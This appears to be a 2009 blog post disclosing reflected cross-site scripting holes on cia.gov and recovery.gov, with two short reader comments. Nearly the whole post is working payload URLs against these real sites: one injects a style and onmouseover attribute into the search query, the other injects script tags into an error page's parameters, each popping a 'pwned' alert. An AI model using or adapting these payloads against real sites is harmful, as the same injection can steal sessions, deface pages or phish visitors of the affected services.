CIA.gov and Recovery.gov XSS

December 15th, 2009  | Tags: ,

https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/)

http://www.recovery.gov/_layouts/1033/Recovery500.aspx?errorurl=<script>alert('and pwned again')</script>&error=<script>alert('pwned')</script>

Share and Enjoy:
  • Facebook
  • HackerNews
  • Reddit
  • Digg
  • del.icio.us
  • Twitter
  • StumbleUpon
  • LinkedIn
  • Google Bookmarks
  • Slashdot
  • Technorati
  • email
  • DZone
  • Suggest to Techmeme via Twitter
  • RSS
  • PDF
  • Print
Leave a comment | Trackback
« »
  1. Woody
    December 22nd, 2009 at 06:34
    Reply | Quote | #1

    You’ll want to fix that mr.president

  2. moldan
    July 15th, 2010 at 13:08
    Reply | Quote | #2

    http://www.cia.gov/ Is wery nice site abaut inteligence of other nations hu are Log dem out nice and freindly.

TOP